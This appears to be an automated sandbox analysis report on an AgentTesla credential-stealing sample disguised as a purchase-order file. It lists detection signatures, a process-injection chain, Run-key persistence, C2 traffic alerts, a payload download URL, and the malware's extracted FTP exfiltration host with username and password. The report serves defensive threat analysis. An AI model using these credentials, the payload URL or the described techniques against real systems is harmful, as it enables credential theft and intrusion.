Windows Analysis Report
PO_9876563647-FLOWTRONIX (FT)UUE.exe

Overview

General Information

Sample name: PO_9876563647-FLOWTRONIX (FT)UUE.exe
Analysis ID: 1523145
MD5: 0fd28ed18e522b9eef69b57aa8bdbf8f
SHA1: 5eba649f7e0cead07e1788973b9deae4c54e7a46
SHA256: 3996fdec3ceac6027730777ec99f6870a9c76e3904a1d2c78cef954a7484090e
Tags: exe, user-abuse_ch

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
Connects to many ports of the same IP (likely port scanning)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • PO_9876563647-FLOWTRONIX (FT)UUE.exe (PID: 2944 cmdline: "C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe" MD5: 0FD28ED18E522B9EEF69B57AA8BDBF8F)
    • InstallUtil.exe (PID: 3280 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Xpnzea.exe (PID: 6876 cmdline: "C:\Users\user\AppData\Roaming\Xpnzea.exe" MD5: 0FD28ED18E522B9EEF69B57AA8BDBF8F)
    • InstallUtil.exe (PID: 4836 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Xpnzea.exe (PID: 4260 cmdline: "C:\Users\user\AppData\Roaming\Xpnzea.exe" MD5: 0FD28ED18E522B9EEF69B57AA8BDBF8F)
    • InstallUtil.exe (PID: 3848 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Source | Rule | Description | Author
00000006.00000002.1652064396.0000000003D1F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000006.00000002.1652064396.0000000003D1F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000000.00000002.1472676483.00000000028F8000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000002.00000002.1623982738.0000000000772000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000002.00000002.1623982738.0000000000772000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Source | Rule | Description | Author
8.2.Xpnzea.exe.41e3250.2.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
6.2.Xpnzea.exe.4583250.3.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.5d40000.11.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
6.2.Xpnzea.exe.3d34a70.4.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
6.2.Xpnzea.exe.3d34a70.4.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

System Summary

Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\Xpnzea.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe, ProcessId: 2944, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Xpnzea
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-01T07:31:32.844326+0200 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.8 | 49706 | 5.2.84.236 | 21 | TCP
2024-10-01T07:31:48.017800+0200 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.8 | 49712 | 5.2.84.236 | 21 | TCP
2024-10-01T07:31:56.098704+0200 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.8 | 49715 | 5.2.84.236 | 21 | TCP
2024-10-01T07:31:26.751565+0200 | 2022640 | 1 | A Network Trojan was detected | 67.212.175.162 | 443 | 192.168.2.8 | 49705 | TCP
2024-10-01T07:31:42.581347+0200 | 2022640 | 1 | A Network Trojan was detected | 67.212.175.162 | 443 | 192.168.2.8 | 49710 | TCP
2024-10-01T07:31:50.753234+0200 | 2022640 | 1 | A Network Trojan was detected | 67.212.175.162 | 443 | 192.168.2.8 | 49714 | TCP
2024-10-01T07:31:26.751565+0200 | 2017962 | 1 | A Network Trojan was detected | 67.212.175.162 | 443 | 192.168.2.8 | 49705 | TCP
2024-10-01T07:31:42.581347+0200 | 2017962 | 1 | A Network Trojan was detected | 67.212.175.162 | 443 | 192.168.2.8 | 49710 | TCP
2024-10-01T07:31:50.753234+0200 | 2017962 | 1 | A Network Trojan was detected | 67.212.175.162 | 443 | 192.168.2.8 | 49714 | TCP
2024-10-01T07:31:33.460095+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.8 | 49707 | 5.2.84.236 | 63484 | TCP
2024-10-01T07:31:33.465327+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.8 | 49707 | 5.2.84.236 | 63484 | TCP
2024-10-01T07:31:48.642241+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.8 | 49713 | 5.2.84.236 | 61512 | TCP
2024-10-01T07:31:48.647690+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.8 | 49713 | 5.2.84.236 | 61512 | TCP
2024-10-01T07:31:56.716214+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.8 | 49716 | 5.2.84.236 | 64722 | TCP
2024-10-01T07:31:56.721436+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.8 | 49716 | 5.2.84.236 | 64722 | TCP

AV Detection

Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3a17e90.5.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}
Source: https://wymascensores.com | Virustotal: Detection: 6%
Source: C:\Users\user\AppData\Roaming\Xpnzea.exe | ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Roaming\Xpnzea.exe | Virustotal: Detection: 32%
Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe | ReversingLabs: Detection: 47%
Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe | Virustotal: Detection: 32%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\Xpnzea.exe | Joe Sandbox ML: detected
Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe | Joe Sandbox ML: detected
Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, Xpnzea.exe
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, Xpnzea.exe
Source: Binary string: protobuf-net.pdbSHA256}Lq source: PO_9876563647-FLOWTRONIX (FT)UUE.exe
Source: Binary string: protobuf-net.pdb source: PO_9876563647-FLOWTRONIX (FT)UUE.exe

Networking

Source: Network traffic | Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.8:49707 -> 5.2.84.236:63484
Source: Network traffic | Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.8:49706 -> 5.2.84.236:21
Source: Network traffic | Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.8:49713 -> 5.2.84.236:61512
Source: Network traffic | Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.8:49712 -> 5.2.84.236:21
Source: Network traffic | Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.8:49716 -> 5.2.84.236:64722
Source: Network traffic | Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.8:49715 -> 5.2.84.236:21
Source: Network traffic | Suricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 67.212.175.162:443 -> 192.168.2.8:49705
Source: Network traffic | Suricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 67.212.175.162:443 -> 192.168.2.8:49705
Source: Network traffic | Suricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 67.212.175.162:443 -> 192.168.2.8:49710
Source: Network traffic | Suricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 67.212.175.162:443 -> 192.168.2.8:49710
Source: Network traffic | Suricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 67.212.175.162:443 -> 192.168.2.8:49714
Source: Network traffic | Suricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 67.212.175.162:443 -> 192.168.2.8:49714
Source: global traffic | TCP traffic: 5.2.84.236 ports 63484,64722,61512,1,2,21
Source: global traffic | TCP traffic: 192.168.2.8:49707 -> 5.2.84.236:63484
Source: global traffic | HTTP traffic detected: GET /servex/Evzbwt.mp3 HTTP/1.1, Host: wymascensores.com, Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /servex/Evzbwt.mp3 HTTP/1.1, Host: wymascensores.com, Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /servex/Evzbwt.mp3 HTTP/1.1, Host: wymascensores.com, Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 67.212.175.162
Source: Joe Sandbox View | IP Address: 5.2.84.236
Source: Joe Sandbox View | ASN Name: SINGLEHOP-LLCUS
Source: Joe Sandbox View | ASN Name: ALASTYRTR
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | FTP traffic detected: 5.2.84.236:21 -> 192.168.2.8:49706
    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-You are user number 2 of 100 allowed.
    220-Local time is now 08:31. Server port: 21.
    220-This is a private system - No anonymous login
    220-IPv6 connections are also welcome on this server.
    220 You will be disconnected after 10 minutes of inactivity.
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /servex/Evzbwt.mp3 HTTP/1.1, Host: wymascensores.com, Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /servex/Evzbwt.mp3 HTTP/1.1, Host: wymascensores.com, Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /servex/Evzbwt.mp3 HTTP/1.1, Host: wymascensores.com, Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: wymascensores.com
Source: global traffic | DNS traffic detected: DNS query: ftp.alternatifplastik.com
Source: InstallUtil.exe | String found in binary or memory: http://ftp.alternatifplastik.com
Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, InstallUtil.exe, Xpnzea.exe | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, InstallUtil.exe, Xpnzea.exe | String found in binary or memory: https://account.dyn.com/
Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe | String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, Xpnzea.exe | String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe | String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe | String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, Xpnzea.exe | String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe | String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, Xpnzea.exe | String found in binary or memory: https://wymascensores.com
Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, Xpnzea.exe | String found in binary or memory: https://wymascensores.com/servex/Evzbwt.mp3
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown | HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.8:49714 version: TLS 1.2

                        System Summary

                        barindex
                        Source: 6.2.Xpnzea.exe.3d34a70.4.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 6.2.Xpnzea.exe.3d34a70.4.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                        Source: 2.2.InstallUtil.exe.770000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 2.2.InstallUtil.exe.770000.0.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3a17e90.5.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3a17e90.5.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                        Source: 6.2.Xpnzea.exe.3d34a70.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 6.2.Xpnzea.exe.3d34a70.4.raw.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3a17e90.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3a17e90.5.raw.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                        Source: initial sample Static PE information: Filename: PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe Code function: 0_2_05E211C8 NtResumeThread,0_2_05E211C8
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe Code function: 0_2_05E211C1 NtResumeThread,0_2_05E211C1
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe Code function: 0_2_05E3FCA8 NtProtectVirtualMemory,0_2_05E3FCA8
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe Code function: 0_2_05E3FCA0 NtProtectVirtualMemory,0_2_05E3FCA0
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exe Code function: 6_2_061811C8 NtResumeThread,6_2_061811C8
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exe Code function: 6_2_061811C1 NtResumeThread,6_2_061811C1
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exe Code function: 6_2_0619FCA8 NtProtectVirtualMemory,6_2_0619FCA8
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exe Code function: 6_2_0619FCA0 NtProtectVirtualMemory,6_2_0619FCA0
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exe Code function: 8_2_05BE11C8 NtResumeThread,8_2_05BE11C8
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exe Code function: 8_2_05BE11C1 NtResumeThread,8_2_05BE11C1
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exe Code function: 8_2_05BFFCA8 NtProtectVirtualMemory,8_2_05BFFCA8
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exe Code function: 8_2_05BFFCA0 NtProtectVirtualMemory,8_2_05BFFCA0
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003909000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003909000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFwwpi.exe, vs PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.00000000038B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.00000000042C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000000.1420783379.00000000005A6000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameFwwpi.exe, vs PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1484550695.0000000005B40000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameHvvnj.dll" vs PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003A03000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1464343248.000000000099E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1472676483.00000000028DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1485888080.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1486633819.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameHvvnj.dll" vs PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1472676483.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1472676483.0000000002C6C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe Binary or memory string: OriginalFilenameFwwpi.exe, vs PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        Source: 6.2.Xpnzea.exe.3d34a70.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 6.2.Xpnzea.exe.3d34a70.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                        Source: 2.2.InstallUtil.exe.770000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 2.2.InstallUtil.exe.770000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3a17e90.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3a17e90.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                        Source: 6.2.Xpnzea.exe.3d34a70.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 6.2.Xpnzea.exe.3d34a70.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3a17e90.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3a17e90.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, F8VZVLUPkb76WPMZ4nC.cs Cryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3909570.1.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3909570.1.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3909570.1.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3909570.1.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3909570.1.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3909570.1.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3909570.1.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3909570.1.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3909570.1.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3909570.1.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/2@2/2
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe File created: C:\Users\user\AppData\Roaming\Xpnzea.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: NULL
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
